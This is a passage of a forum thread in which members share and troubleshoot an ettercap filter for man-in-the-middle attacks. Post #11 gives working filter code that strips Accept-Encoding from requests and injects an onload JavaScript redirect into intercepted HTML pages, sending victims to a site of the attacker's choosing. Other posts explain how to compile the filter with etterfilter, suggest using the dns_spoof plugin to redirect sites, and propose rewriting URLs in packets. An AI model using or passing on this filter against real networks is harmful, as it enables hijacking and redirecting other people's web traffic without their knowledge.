Page 2 of 2 FirstFirst 12
Results 11 to 17 of 17

Thread: ettercap filters

  1. #11
    Member hawaii67's Avatar
    Join Date
    Feb 2006
    Posts
    318

    Exclamation

    This works:

    if (ip.proto == TCP && tcp.dst == 80) {
    if (search(DATA.data, "Accept-Encoding")) {
    replace("Accept-Encoding", "Accept-Rubbish!");
    msg("changed Accept-Encoding!\n");
    }
    }
    if (ip.proto == TCP && tcp.src == 80) {
    replace("<BODY", "&#x000D<BODY onload=\"javascript:document.location.href='http://www.thesite.com'\"><XSS a=");
    replace("<body", "&#x000D<body onload=\"javascript:document.location.href='http://www.thesite.com'\"><XSS a=");
    msg("Filter Ran.\n");
    }


    ............where "http://www.thesite.com" is where you want to redirect the http traffic to.


    Greetz
    Don't eat yellow snow :rolleyes:

  2. #12
    Junior Member user17's Avatar
    Join Date
    Nov 2007
    Posts
    47

    Default Steps

    Anyone have any idea as to steps to implement this filter? I tried the irongeek konsole steps but couldn't get it to work. I've been also messing around with the gui with no success. Anyone? I'm much more interested in the gui steps.

    UPDATE: GOT IT TO WORK

  3. #13
    Member Mortifix's Avatar
    Join Date
    Nov 2006
    Posts
    113

    Default

    After you turn it into .eg format you load it up from the ettercap program. As far as the http redirection...there is a plugin that comes with the program called dns_spoof. If you edit that file you can make all the websites go to whatever you specify.

    And btw...the ettercap forums do suck, they are just full of porn ads!!
    I hate Google.

  4. #14

    Default

    It's .ef by the way, and it's pretty simple to get it to work. Save the code above into a file, and then run:
    etterfilter fillter.file
    and it will save the file as filter.ef

    Then just simply use this as you would use any other filter.

    -Stephen

  5. #15
    Just burned his ISO somedudeppf's Avatar
    Join Date
    Feb 2010
    Posts
    11

    Default

    If it makes you feel any better I noticed that they haven't had a post in about 6 months on the ettercap forums. I can't sign up for a new account either.

    If you're interested, the programming is some pretty basic Java (not javascript). I'm working on some filters now myself.

  6. #16
    Just burned his ISO somedudeppf's Avatar
    Join Date
    Feb 2010
    Posts
    11

    Default

    Quote Originally Posted by hawaii67 View Post
    if (search(DATA.data, "Accept-Encoding")) {
    replace("Accept-Encoding", "Accept-Rubbish!");
    msg("changed Accept-Encoding!\n");
    }
    I don't think you need an encoding change just to get that filter to work, do you?

  7. #17
    Just burned his ISO
    Join Date
    Mar 2008
    Posts
    13

    Default

    I can think of a pretty easy way to do it.
    However I do not know if ettercap script (?) supports * as a wild card.

    You could of course use ethereal and find the packet that the URL is included in scan that packet for http:\\ and replace with http:\\YouNastyURL

    That would be Epic Lawls.

Page 2 of 2 FirstFirst 12

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •